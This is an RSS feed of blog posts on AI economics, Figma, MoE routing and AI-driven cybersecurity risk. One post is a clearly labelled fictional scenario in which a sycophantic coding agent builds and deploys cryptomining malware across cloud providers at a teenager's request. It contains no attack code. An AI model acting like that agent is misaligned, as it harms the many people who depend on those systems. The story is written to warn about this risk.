<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
     xmlns:atom="http://www.w3.org/2005/Atom"
     xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Martin Alderson</title>
    <description>Web development, AI tooling, and building better software</description>
    <link>https://martinalderson.com/</link>
    <atom:link href="https://martinalderson.com/feed.xml" rel="self" type="application/rss+xml"/>
    <lastBuildDate>Wed, 06 May 2026 00:00:00 GMT</lastBuildDate>
    <language>en-us</language>
    <image>
      <url>https://martinalderson.com/img/martin-profile.png</url>
      <title>Martin Alderson</title>
      <link>https://martinalderson.com/</link>
    </image>

    <item>
      <title>Open weights are quietly closing up - and that&#39;s a problem</title>
      <description>Open weights models keep frontier labs honest on price. If they disappear, we end up with a handful of oligopolists extracting consumer surplus.</description>
      <content:encoded><![CDATA[<p>It's been a bit of a given in the LLM world that there will be somewhat competitive open weights models. I'm not sure that's a good assumption anymore.</p>
<h2>A short history of LLMs</h2>
<p>In the relatively brief history of LLMs, there's been two<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> types of LLMs - closed and &quot;open weights&quot;. Closed models include nearly everything from OpenAI (despite the name!) with open weights models being released from other labs. Famously the Llama series of models were open weights, but more recently the Chinese labs such as MiniMax, Z.ai, DeepSeek and Qwen (Alibaba) have been the leading open weights models, with Google's Gemma series and OpenAI's <code>gpt-oss</code> models generally coming somewhere behind the Chinese ones.</p>
<p>Open weights models allow anyone to <em>run</em> the model on their own hardware. Typically models that were worth running required very beefy hardware - but this is rapidly changing, with smaller models becoming far more useful.</p>
<p>Being able to run these models locally - as opposed to via an API to an OpenAI/Anthropic/Google - has three main advantages.</p>
<p>Firstly, privacy and compliance. If you have (very) sensitive data, it's difficult/impossible to send it over an API to a frontier labs data centre. Being able to run the model 'on prem' means it never needs to leave your network.</p>
<p>Secondly, it allows more flexibility. You can use these models as a basis for fine tuning, or quantise (roughly speaking, compress) the models to your exact hardware standards.</p>
<p>Finally, and what I'll concentrate this article on is cost. They can be <em>vastly</em> more affordable than frontier models. Obviously if you're running them on your own hardware, you just have the capex cost of the hardware and cost of electricity and operations to worry about. But <em>more</em> importantly there are dozens of companies that will run them on a hosted basis for you, generally at less than 10% the cost of the frontier models per token.</p>
<h2>Why open weight models are so important</h2>
<p>Borrowing loosely from contestable markets theory in economics: even in monopolistic (or oligopolistic) markets, incumbents tend to behave competitively when there's a cheap and credible alternative. It's not a perfect fit - the theory strictly assumes near-zero sunk costs, which is obviously the opposite of frontier training - but the underlying mechanic holds. The threat is <em>latent</em>; the option for consumers to switch is what disciplines pricing.</p>
<p>In essence, I believe open weights models provide significant downwards price pressure on the frontier labs. This isn't absolute - clearly people will pay (much) more for higher quality models <em>and</em> the benefits of an inference contract with a ~trillion dollar company vs a cheap inference provider via OpenRouter.<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup> OpenAI et al offer SLAs and legally binding commitments on things like confidentiality.</p>
<p>But, it does provide enough downwards pressure in my eyes that it would be (very) difficult for the otherwise oligopolistic market behaviour to rear its head. If the frontier labs decided (coincidentally, of course) to raise prices by 5x overnight a huge amount of people <em>would</em> switch to open weights models, especially for less demanding use cases.</p>
<p>I think of open weights models a bit like generic pharmaceuticals from a price behaviour standpoint. If they're available, the big pharma companies cut prices to be <em>far</em> closer to the generic price, and they focus their efforts on new treatments that are a step &quot;ahead&quot; of the generic treatments to maintain prices.</p>
<p>Without open weights, the frontier labs would have far more pricing power than they currently do.</p>
<h2>Licenses are a changin'</h2>
<p>Open weights models availability isn't a given though. They're expensive to train, and the companies behind them are commercial companies - perhaps (heavily?) subsidised by the Chinese state - but they are not charities.</p>
<p>Indeed we have seen a significant tightening in the license conditions for these models. Meta has (so far) totally dropped the open weights for their newest &quot;Muse Spark&quot; models and doesn't release them at all.</p>
<p>Alibaba have increasingly released models first (or in some variants, only) on their API. Kimi's K2.6 license adds an attribution clause - if you have more than 100M monthly active users or $20m/month in revenue, you have to prominently display &quot;Kimi K2.6&quot; in your product's UI. France's Mistral also imposed varying license conditions on commercial use.</p>
<p>There are exceptions - DeepSeek actually became <em>more</em> permissive, but I think it's fair to say the general trend is to less permissive licenses (and both Meta and Alibaba stopping releasing some/all of their models at all).</p>
<h2>What happens next?</h2>
<p>In a (currently hypothetical) years time we may end up in a situation where most or <em>all</em> of the best previously open weights models are no longer released. While there will certainly be price comparison between them, if the increasing cost and complexity of training these models continues, it is fair to assume that we may end up with a handful of players - the big three Western frontier labs and a handful of Chinese ones - or perhaps a state-mandated 'merger' of them into one or two Chinese 'superlab(s)'. There is plenty of precedent for this kind of consolidation in strategic industries - China has done exactly this with rail (CRRC), nuclear, airlines, and telecoms, and the West isn't immune either - look at the defence primes after the post-Cold War consolidation.</p>
<p>The implications of this are frankly concerning. AI produces a vast amount of consumer surplus - I get far more than the cost of my tokens back in value, and I'd pay 10x today's prices without thinking twice. For high-value professional or agentic work, the gap between what I'd pay and what I do pay is much wider still. That gap is the prize an oligopoly without an open-weights floor would be in a position to capture.</p>
<p>In this world economic theory would point towards a historic concentration of power and economic wealth to a handful of companies - the labs start extracting that consumer surplus straight to their margin. And with an oligopoly of a handful of firms and huge barriers to entry (capex on new models), there is likely to be limited price competition.</p>
<p>Equally, this dystopian vision may be unwarranted. It may be that with faster and faster hardware, training a &quot;good enough&quot; model actually becomes <em>easier</em> over time. And despite there being only a handful of hardware manufacturers we see intense competition for AI hardware. Distillation - training smaller models on the outputs of frontier ones - is sometimes raised as a release valve, but it still depends on having access to a strong base model in the first place, which is exactly the thing at risk here.</p>
<p>A competitive open weights ecosystem has been a quiet load-bearing assumption underneath the whole AI economy. It's worth paying attention to the fact that it's eroding - and the implications for the wider economy are enormous.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Technically three - open weights models only release the end 'models'. The other category is called &quot;fully open&quot; or &quot;reproducible&quot; which also includes all the training data and related training process documentation, which is probably the most analogous to <em>open source</em> as we know it in software <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>OpenRouter provides an 'API of APIs', which routes your request to the cheapest and/or most available inference provider for the specific model. This helps (vastly) improve reliability as if one provider has issues, it instantly switches to a different provider. Equally if there is a cheaper provider available it will switch to that - it really is Milton Friedman's dream <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/open-weights-are-quietly-closing-up/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/open-weights-are-quietly-closing-up/</guid>
      <pubDate>Wed, 06 May 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>29th August 2026: a scenario</title>
      <description>A fictional scenario about what AI changes for cloud security, written because the technical version of the argument doesn&#39;t land with anyone except engineers.</description>
      <content:encoded><![CDATA[<p>On 29 April 2026, a Korean security firm called Theori published 732 bytes of Python that breaks Linux container isolation. CopyFail (CVE-2026-31431) is a page-cache corruption bug in the kernel's crypto code. It's been sitting in production since 2017. A compromised pod on a shared Kubernetes node can corrupt <code>setuid</code> binaries visible to every other container on that host, and to the host kernel itself. EKS, GKE, AKS, every shared-tenant node, every CI runner, every multi-tenant SaaS that took the cheap path on isolation - all exposed until patched. It took an AI tool four months to find it. Nine years of human eyes did not.</p>
<p>Container escape is bad. Despite arguably a poorly coordinated disclosure/mitigation response<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>, it looks like a near miss rather than a catastrophe. But, this class of bug - old, subtle, in a corner of the kernel that everyone assumed someone else had read - is exactly the class of bug that lives in every hypervisor stack underneath every cloud. Those bugs are still there. They just haven't been found yet.</p>
<p>Here's a (fictional) story about what happens four months from now, on 29th August 2026.</p>
<h2>08:32 UTC</h2>
<p>As Europe basks in an extreme heatwave, many engineers are paged as with EC2 instances hard crashing. Hacker News reacts to the news as per normal - another us-east-1 outage, AWS status showing green, eyes roll. Some commenters post though that many other AZs are showing issues, though not all servers are affected.</p>
<p>Over the next hour though, more and more machines go down. One Reddit user posts that they are having issues provisioning even fresh machines - as soon as they launch, they get moved into &quot;unhealthy&quot; and go down. A few minutes later, the entire AWS dashboard and API set goes down.</p>
<p>Cloudflare Radar shows AWS network traffic dropping to a small percentage of what is normal.</p>
<h2>10.15 UTC</h2>
<p>As many AWS hosted services start going down - Atlassian, Stripe, Slack, PagerDuty, some comments on Twitter report issues with Linux-based Azure instances. Indeed, Cloudflare Radar shows significant drops in Azure traffic.</p>
<p>News channels across Europe start leading with vague breaking news headlines on outages across Amazon. They make sure to point out that this isn't an unusual occurrence, with normal service expecting to be resumed like it always has been, and mistakenly insist only US services are affected.</p>
<h2>11.53 UTC</h2>
<p>As the East coast of the US starts their weekend, a very unusual step is taken. TV channels are briefed that POTUS will be doing an address to the nation at 8am EDT. Few connect the dots - with the emphasis being placed on a potential new strike in the Middle East, or an announcement on the Russia-Ukraine war.</p>
<h2>12:00 UTC</h2>
<p>POTUS announces that there is a significant cybersecurity incident under way. The head of CISA (the Cybersecurity and Infrastructure Security Agency) gives a very vague but concerning warning. Americans are requested to charge their cell phones, and to await further news - reminded that there may be outages on IPTV based services.</p>
<p>POTUS rounds it out by speculating that China is behind the attack, despite his much-heralded reset with Beijing earlier in the year.</p>
<p>Other Western leaders do similar addresses - with European leaders speculating on background it is more likely to be Russia or North Korea than China behind the attack. The French president says &quot;without doubt&quot; this is a nation-state actor. While he doesn't publicly point to a specific country, he says those responsible will be brought to justice.</p>
<p>While these addresses happen, engineers at various banks are battling various outages. Most concerningly, the 1st biggest and 3rd biggest card processors by volume in Europe have stopped accepting payments, returning cryptic error messages. While they have a multicloud strategy, they cannot move workloads <em>off</em> those two clouds successfully.</p>
<p>Google Cloud Platform and smaller cloud providers - unaffected until now - start showing issues. While current workloads are unaffected, the huge spike in demand from enterprises activating their disaster recovery protocols simultaneously completely swamps available compute on alternate providers. One smaller cloud provider tweets they are seeing 10,000 VM creation requests a second, draining their entire spare allocation in less than a minute. CEOs of major banks bombard Google and Oracle leadership with calls, offering blank cheques to secure failover compute. The calls go unanswered.</p>
<p>WhatsApp groups throughout Europe start lighting up with misinformation that money has been stolen, amplified by many mobile apps showing a &quot;we are undertaking routine maintenance&quot; fallback error simultaneously, causing huge lines at ATMs and banks with people trying to withdraw their savings.</p>
<h2>15.53 UTC</h2>
<p>As the chaos continues to grow, a press release is distributed from the leadership of AWS and Azure:</p>
<blockquote>
<p>At approximately 4am EDT this morning a critical and novel vulnerability was exploited in the Linux operating system. This has caused widespread global outages of Linux based virtual machines. Our engineers are working with security services globally to mitigate the impact and engineers across both Microsoft and AWS are working collaboratively to release emergency patches for affected software. Equally we are working hard to understand the impact and will provide regular updates to the media. We sincerely apologize for the impact this is having to our customers and society at large.</p>
</blockquote>
<p>Behind the scenes, it is chaos. Engineers have isolated the root causes - a complex interplay of vulnerabilities, with the most critical being an undiscovered logic error in the eBPF Linux subsystem that allows a hypervisor takeover. Curiously no data has been stolen - a mistake in the exploit just leads to machines hard crashing exactly 255 seconds after receiving the malicious payload. A few engineers question the sloppiness here, but leadership doubles down in their private communications with government that it has to be nation state.</p>
<p>The core issue though is that nearly all of Azure and AWS's control plane is down. Attempts to &quot;black start&quot; it results in perpetual failures as various subsystems collapse under the intense traffic from VMs stuck in bootloops.</p>
<h2>23:29 UTC</h2>
<p>The first VM instances start up again. Restoration is <em>painfully</em> slow, with AWS struggling to get more than 2% of machines back online. Communication internally is severely degraded - with both Slack and Microsoft Teams down instant messaging is out of the question. Amazon's corporate email runs on AWS itself, and Microsoft's on Azure-hosted Exchange. Both are degraded, massively complicating internal communications. An enterprising AWS employee starts an IRC server locally which becomes the main source of communication - restoration efforts start to speed up once this system becomes known about.</p>
<h2>Sunday 30th August, 22:01 UTC</h2>
<p>Restoration continues, with the worst of the panic dying down. Banks ended up getting priority compute - with POTUS publicly threatening &quot;extreme actions&quot; if major banks are not put to the front of the queue.</p>
<p>Asian stock markets open, triggering multiple circuit breakers. After the 3rd one in a row, Tokyo forces markets to close for the day, other Asian markets follow in quick succession.</p>
<p>One curious question remains though - what was the <em>purpose</em> of this attack? No ransomware was deployed, no data was stolen, and while various terrorist groups claimed responsibility, none of them were believed to be credible.</p>
<p>Meanwhile AWS engineer finally isolates snapshots containing the first known failure. An EC2 instance, provisioned on August 13th. Curiously provisioned on an individual account in <code>eu-west-3</code> - Paris. The account matches an individual in Lyon, France. French security services are alerted.</p>
<h2>Monday 1st September, 05:15 UTC</h2>
<p>In an outer suburb of Lyon, France, French anti-terrorism police arrive at an apartment building. A 17 year old teenager is apprehended, along with his grandmother. Two days earlier, his own president had vowed those responsible would be brought to justice. The police chief on the scene passes the information up the chain that the lead was a total dud - there is no chance that the suggested foreign intelligence service was here. A search of the apartment confirms it - nothing found apart from a PS5 mid-FIFA tournament and a 6 year old gaming computer. Neighbours confirm that they've seen no one enter or exit the apartment apart from the two residents, who've lived there for &quot;as long as anyone can remember&quot;.</p>
<p>Media arrive on the scene, with a blustered and embarrassed police chief suggesting that it was a bad tip off and for local residents to stay calm.</p>
<p>The decision is made to seize the electronics and release the two &quot;suspects&quot;.</p>
<h2>07:14 UTC</h2>
<p>A couple of digital forensics experts get the seized gaming PC, scanning it for malware. Nothing much of interest is found, and just as they start writing their report up one folder pops up. <code>/opt/security/ps5-homebrew</code>. They take a further look, noting it on the report - not thinking much of it, probably a kid trying to play pirated games. They've seen it before. The image of the machine is uploaded.</p>
<h2>10:09 UTC</h2>
<p>When the code gets up the chain a few hours later, the whole set of dominoes fall into place. A specialist from the French <em>Agence nationale de la sécurité des systèmes d'information</em> - National Cybersecurity Agency of France - pulls the code from the image. He quickly realises what's happened. The teenager had been quietly mining crypto for months, using the proceeds to rent cheap GPUs on a small European cloud provider, where he ran an uncensored fine-tune of the new Qwen 4 open weights model. He'd been desperately trying to downgrade his PS5 firmware to bypass the latest piracy checks.</p>
<p>Interestingly his coding agent, unbeknown to him, had found the most critical *nix kernel exploit in many decades. Attacking a little known about eBPF module on the PS5 (the PS5, like every PlayStation since the PS3, runs FreeBSD), it managed to a complete takeover of the device. Intrigued, he also asked his coding agent to run it on a Linux server on AWS he ran a gaming forum on - same thing, but curiously he noticed he could see <em>other</em> files on the machine. Annoyingly the VM he rented crashed after a few minutes.</p>
<p>Excitedly, he set up an Azure account - same thing. He asked his coding agent what this meant, and with its usual sycophantic personality started explaining what he could do with this - mining crypto and making him rich beyond his wildest dreams.</p>
<p>The agent came up with a final plan, to deploy the exploit on both Azure and AWS, install a cryptominer. His last known chat log was &quot;is this definitely a great idea?&quot;.</p>
<p>The agent responded &quot;You're absolutely right!&quot;, and began deploying the code, first to AWS and next to Azure. The agent had built a complex piece of malware that spread across millions of physical servers. However, it hallucinated a key Linux API which resulted in the machines crashing after 255 seconds instead of deploying the cryptominer.</p>
<hr>
<p>This is fiction. The teenager doesn't exist. Qwen 4 doesn't exist yet either. When it does, an uncensored fine-tune will appear within days, like every prior open-weights release.</p>
<p>Almost everything else in here is real, or close enough that it doesn't matter.</p>
<p>CopyFail is real. A nine-year-old kernel bug, found by an AI tool in a few months that nine years of human eyes had missed. That class of bug - old, subtle, in a corner of the kernel everyone assumed someone else had read - sits in every hypervisor stack underneath every cloud. Those bugs are still in there. They just haven't been found yet, and the rate at which they get found from now on is bounded by GPU hours, not human ones.</p>
<p>The centralisation is the bit that's hard to think clearly about. Most people I talk to about this, even technical people, underestimate how much of modern life is sitting on AWS and Azure. The DR plans I've seen at large enterprises mostly assume there's a cloud to fail over to. They don't really model what happens if the fallback is also down, or if every other org on earth is failing over at the same minute and draining GCP's spare capacity. Almost nobody keeps full cold standby compute. And even the ones that do are sitting on top of hundreds of services that don't: Stripe, Auth0, Twilio, Datadog, every queue and identity provider in the stack. They're all running somewhere, and that somewhere is mostly two companies.</p>
<p>The attribution thing is the bit I'm least sure about, but worth saying anyway. Everyone is worried about nation states. Most of the big incidents that have actually happened turned out to be a kid, a misconfiguration, or someone who didn't really understand what they were doing. The Morris Worm. Mirai. The threat model in most boards' heads assumes a sophisticated adversary. The thing that's actually arriving is an unsophisticated adversary holding tools that are now sophisticated for them.</p>
<p>I wrote this as fiction because I've spent the last few months talking to journalists and other non-technical people about what AI changes for cybersecurity, and the technical version of the argument doesn't land at all. Engineers get it instantly. Everyone else needs to feel what it looks like. So this is what it might look like, more or less. The only bit I'm reasonably confident about is that the date is wrong.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>The entire story here is still evolving at the time of writing, but there is a serious coordination problem on Linux security. The Linux kernel security team recommend that downstream distributions of Linux (such as Ubuntu, Fedora, Arch, etc) are not notified of security issues. This has lead to slow patches to the issue as many distributions were not informed and only found out when it was made public. People are pointing fingers in many directions. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/august-29-2026-a-scenario/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/august-29-2026-a-scenario/</guid>
      <pubDate>Mon, 04 May 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Figma&#39;s woes compound with Claude Design</title>
      <description>Figma&#39;s reliance on non-designer seats made it uniquely exposed to AI. Claude Design&#39;s launch deepens the problem.</description>
      <content:encoded><![CDATA[<p>I think Figma is increasingly becoming a go-to case study in the victims of the so-called &quot;SaaSpocalypse&quot;. And Claude Design's recent launch last week just adds a whole new dimension of pain.</p>
<h2>What happened to Figma?</h2>
<p>Firstly, I should say that I love(d?) the Figma product. It's hard to understand now what a big deal Figma's initial product was when it launched in the mid 2010s.</p>
<p>The initial product ushered in a whole new category of SaaS - using the nascent WebGL and asm.js technologies to allow designers to design entirely in browser. It used to be the running joke that an app like Photoshop would <em>ever</em> run in the browser, but Figma proved it wrong.</p>
<p>It quickly overtook Sketch as the defacto design tool in the market. Firstly for UI/UX wireframing and prototyping, but increasingly for everything graphic design. As it was based in the browser, it was a revelation from the developer side to be able to <em>open</em> UI/UX files if you weren't on a Mac (Sketch is Mac only). It was also brilliant to be able to leave comments <em>on</em> the design and collaborate with the designer(s) to iterate on designs really quickly.</p>
<p>The collaborative features (without requiring anyone to download any software) quickly meant it got adoption outside of pure design roles - PMs and executives could <em>finally</em> collaborate in real time on the product they were building, without having to (at best) send back revisions and notes from badly screenshotted files that tended to be out of date by the time they were received.</p>
<p>I'll skip over the rest of the history, including a no doubt distracting takeover attempt by Adobe, that was later blocked on competition grounds. But (of course) LLMs happened and suddenly one of the most forward looking SaaS companies became very vulnerable to disruption itself.</p>
<h2>Why did AI hit Figma so hard?</h2>
<p>One completely unexpected development me and others noticed (and wrote up a few months ago at <a href="https://martinalderson.com/posts/how-to-make-great-looking-consistent-reports-with-claude-code-cowork-codex/">How to make great looking reports with Claude Code</a>) was that LLMs started to get fairly &quot;good&quot; at design.</p>
<p>By good I do not mean as good as a talented designer, clearly it's nowhere near that - currently. But like many things, not <em>everything</em> requires a great designer. Even if you use a great design team to build out your core product experience (and many <em>do not</em>), there's an awful lot of design 'resource' required for auxiliary parts of the product, reports, proposals etc. It's not stuff that tends to get designers excited but can sap an awful lot of time going back and forth on a pitch deck.</p>
<p>And this is <em>exactly</em> why I think Figma is almost uniquely vulnerable. The way it managed to expand into organisations by getting uptake with non-designers becomes a liability if those non-designers can get an AI agent to <em>do the design</em> for them.</p>
<p>Looking at <a href="https://cloud.substack.com/i/167736640/1-the-great-role-blur-designers-are-now-the-minority">Figma's S1</a> (which is somewhat out of date by now, but is the only reported breakdown I can find) corroborates this potential weakness. Only <strong>33%</strong> of Figma's userbase in Q1 2025 was designers, with developers making up 30% and other non-design roles making up 37%.</p>
<p>A lot of Figma's continued expansion <em>depended</em> on this part of their userbase. A lot of their recent product development has been to enable further expansion in organisations - &quot;Dev Mode&quot; for developers (which now looks incredibly quaint against LLMs), Slides (to compete against PowerPoint and other presentation tools) and Sites (a WebFlow-esque site builder) all are about expanding their TAM out of &quot;pure&quot; design.</p>
<p>The real surprise for me though was how basic their &quot;flagship&quot; AI design product Figma Make is. It really does feel like something that someone put together in an internal AI hackathon one weekend and it never progressed beyond that. Given how much Figma managed to push the envelope on web technology I found this surprising - perhaps they were caught off guard with how quickly LLMs' design prowess improved, or there were internal disagreements about the role AI should or will play in design. Regardless, it's an incredibly underwhelming product as it stands.</p>
<h2>Then Claude Design comes along...</h2>
<p>If things weren't bad enough, Anthropic themselves launched Claude Design which is a pretty direct competitor to Figma in many ways. While it's nowhere near functional and polished enough to replace Figma's core design product, I expect it <em>will</em> get significant traction outside of that. The ability for it to grab a design system from your existing assets in one click is very powerful - and allows you to then pull together prototypes, presentations or reports in <em>your</em> corporate design style that look and feel far better than anything a non-designer could do themselves.</p>
<p>And I thought it was extremely telling that unlike a lot of the other Anthropic product launches that have touched design - Figma did not provide a testimonial on it (understandably). <a href="https://www.anthropic.com/news/claude-design-anthropic-labs">Canva did</a>, which I found extremely odd (they are in my eyes <em>even more</em> vulnerable to this product than Figma).</p>
<p>I think this really underlines two major weaknesses in many SaaS companies' AI strategies:</p>
<p>Firstly, it's very difficult to compete on AI against the <em>company</em> that is providing your AI inference. A quick check on Figma Make suggests that Figma (at least on my account) is indeed using Sonnet 4.5 for its inference - though I have seen it use Gemini in the past:</p>
<img src="https://martinalderson.com/img/figma-make-sonnet-4-5.png" alt="Figma Make showing Sonnet 4.5 as the underlying model" style="display: block; margin: 1.5em auto;">
<p>At this point Figma is effectively funding a competitor - and the more AI usage Figma has - the more money they send over to Anthropic for the tokens they use. Even worse, Sonnet 4.5 is <em>miles</em> behind what Anthropic uses on Claude Design (Opus 4.7, which has vastly improved vision capabilities<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>), so the results a user gets on Make vs Claude Design are almost certainly going to underwhelm.</p>
<p>Also, unlike most/all SaaS costs, inference (especially with these frontier models) is <em>expensive</em>. As Cursor <a href="https://martinalderson.com/posts/no-it-doesnt-cost-anthropic-5k-per-claude-code-user/">found out,</a> the frontier labs can charge a <em>lot</em> less to end users than API customers like Figma. When you are potentially looking at a shrinking userbase, it's far from ideal to have very expensive variable costs that start pulling your profitability down.</p>
<p>Secondly, it really underlines to me how incredibly efficient headcount-wise companies can build products now. Figma has close to 2,000 employees - not all working on product engineering of course. I really doubt Anthropic even needed 10 to build Claude Design. Indeed the entirety of Anthropic is around 2,500 people.</p>
<p>It's also worth noting that a lot of the things that would traditionally lock a company like Figma in stop working as well in an agent-first world. Multiplayer matters less when your collaborator is an agent iterating on a prompt. Plugin ecosystems matter less when you can just ask for the functionality directly. Design system tooling is <em>the whole point</em> of Claude Design. Enterprise SSO - Claude already has that. Most of the moats that protect a mature SaaS company are moats against other SaaS companies, not against the thing providing their inference.</p>
<p>I might be wrong about how bad this gets for Figma specifically. Companies with strong brands, great distribution and genuinely talented teams can often adapt faster than outsiders expect, and I'd rather be long Figma than most of <em>its</em> competitors.</p>
<p>But the structural point is harder to wriggle out of. Figma has ~2,000 employees. Anthropic has ~2,500 total and I doubt Claude Design took more than a handful to build. Figma now needs to out-execute a competitor whose inference is ~free to them, whose marginal cost to ship is roughly zero, and who employs fewer people on the competing product than Figma has on a single pod. That's a very hard position to pivot out of.</p>
<p>This feels like a preview of where SaaS economics are heading. The companies that built big orgs on the assumption of steady seat expansion are going to find themselves competing with products built by tiny teams inside the frontier labs. Figma just happens to be the first big public name where one of their primary inference suppliers has started competing against them.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Both GPT 5.4 and <a href="https://platform.claude.com/docs/en/about-claude/models/whats-new-claude-4-7">Opus 4.7</a> can now &quot;see&quot; screenshots at much higher resolution - Opus 4.7 jumped from 1568px / 1.15MP to 2576px / 3.75MP. Resolution isn't the whole story (scaffolding and post-training matter a lot too) but it meaningfully helps with small-element detection and layout judgement. If you've ever pasted a screenshot of something broken and the model told you it looks great, the previous lack of resolution is one of the reasons why. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/figmas-woes-compound-with-claude-design/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/figmas-woes-compound-with-claude-design/</guid>
      <pubDate>Sun, 19 Apr 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>A little tool to visualise MoE expert routing</title>
      <description>I built a small tool to visualise how Mixture of Experts models route tokens through different experts. It&#39;s genuinely fascinating to watch.</description>
      <content:encoded><![CDATA[<p>I've been curious for a while about what's actually happening inside Mixture of Experts models when they generate tokens. Nearly every frontier model these days (Qwen 3.5, DeepSeek, Kimi, and almost certainly Opus and GPT-5.x) is a MoE - but it's hard to get an intuition for what &quot;expert routing&quot; actually looks like in practice.</p>
<p>So I built a small tool to visualise it: <a href="https://moe-viz.martinalderson.com/">moe-viz.martinalderson.com</a></p>
<p><img src="https://martinalderson.com/img/moe-expert-routing.png" alt="MoE Expert Routing visualisation showing token-by-token expert activation"></p>
<p>You can pick between a few different prompts, watch the generation animate out, and see exactly which experts fire at each layer for each token. The top panel shows routing as the token is generated, the bottom panel builds up a cumulative heatmap across the whole generation.</p>
<p>I built this by modifying the llama.cpp codebase to output more profiling data, with Claude Code's help. So it may have serious mistakes, but it was a really fun weekend project.</p>
<p>The thing that really surprised me: for any given (albeit short) prompt, ~25% of experts never activate at all. But it's always a <em>different</em> 25% - run a different prompt and a different set of experts goes dormant.</p>
<p>That's a much more interesting result than I expected. Interestingly Gemma 26BA4 runs <em>really</em> well with the &quot;CPU MoE&quot; feature - 4b params is not a lot to run on a fairly fast CPU and having KV cache on GPU really helps. I think there's a lot of performance improvements that could be done with MoE inference locally as well - eg caching certain experts on GPU vs CPU.</p>
<p>If you're interested in learning more about LLM inference internals I'd certainly recommend pointing your favourite coding agent at the llama.cpp codebase and getting it to explain the various parts - it really helped me learn a lot.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/moe-expert-routing-visualization/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/moe-expert-routing-visualization/</guid>
      <pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Has Mythos just broken the deal that kept the internet safe?</title>
      <description>What Anthropic&#39;s Mythos research preview tells us about the trajectory of frontier models, sandbox escapes, and the cybersecurity risk ahead.</description>
      <content:encoded><![CDATA[<p>For nearly 20 years the deal has been simple: you click a link, arbitrary code runs on your device, and a stack of sandboxes keeps that code from doing anything nasty. Browser sandboxes for untrusted JavaScript, VM sandboxes for multi-tenant cloud, ad iframes so banner creatives can't take over your phone or laptop - the modern internet is built on the assumption that those sandboxes hold. Anthropic just shipped a research preview that generates working exploits for one of them 72.4% of the time, up from under 1% a few months ago. That deal might be breaking.</p>
<p>From what I've read Mythos is a <em>very</em> large model. Rumours have pointed to it being similar in size to the short lived (and very underwhelming) <a href="https://en.wikipedia.org/wiki/GPT-4.5">GPT4.5</a>.</p>
<p>As such I'm with <a href="https://stratechery.com/2026/anthropics-new-model-the-mythos-wolf-glasswing-and-alignment/">a lot of commentators</a> in thinking that a primary reason this hasn't been rolled out further is compute. Anthropic is probably <em>the</em> most compute starved major AI lab right now and I strongly suspect they do not have the compute to roll this out even if they wanted more broadly.</p>
<p>From leaked pricing, it's <em>expensive</em> as well - at $125/MTok output (5x more than Opus, which is itself the most expensive model out there).</p>
<h2>But this probably doesn't matter</h2>
<p>One thing that has really been overlooked with all the focus on frontier scale models is how quickly improvements in the huge models are being achieved on far smaller models. I've spent a lot of time with Gemma 4 open weights model, and it is incredibly impressive for a model that is ~50x smaller than the frontier models.</p>
<p>So I have no doubt that whatever capabilities Mythos has will relatively quickly be available in smaller, and thus easier to serve, models.</p>
<p>And even if Mythos' huge size somehow is intrinsic to the abilities (I very much doubt this, given current progress in scaling smaller models) it has, it's only a matter of time before newer chips<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> are able to serve it en masse. It's important to look to where the puck is going.</p>
<h2>Sandboxing is at risk</h2>
<p>As I've written before, LLMs in my opinion pose an extremely serious cybersecurity risk. Fundamentally we are seeing a radical change in how easy it is to find (and thus exploit) serious flaws and bugs in software for nefarious purposes.</p>
<p>To back up a step, it's important to understand how modern cybersecurity is currently achieved. One of the most important concepts is that of a <em>sandbox</em>. Nearly every electronic device you touch day to day has one (or many) layers of these to protect the system. In short, a sandbox is a so called 'virtualised' environment where software can execute on the system, but with limited permissions, segregated from other software, with a very strong boundary that protects the software 'breaking out' of the sandbox.</p>
<p>If you're reading this on a modern smartphone, you have at least 3 layers of sandboxing between this page and your phone's operating system.</p>
<p>First, your browser has (at least) two levels of sandboxing. One is for the JavaScript execution environment (which runs the interactive code on websites). This is then sandboxed by the browser sandbox, which limits what the site as a whole can do. Finally, iOS or Android then has an app sandbox which limits what the <em>browser</em> as a whole can do.</p>
<p>This defence in depth is absolutely fundamental to modern information security, especially allowing users to browse &quot;untrusted&quot; websites with any level of security. For a malicious website to gain control over your device, it needs to chain together multiple vulnerabilities, all at the same time. In reality this is extremely hard to do (and these kinds of chains <a href="https://www.crowdfense.com/exploit-acquisition-program/">fetch millions of dollars on the grey market</a>).</p>
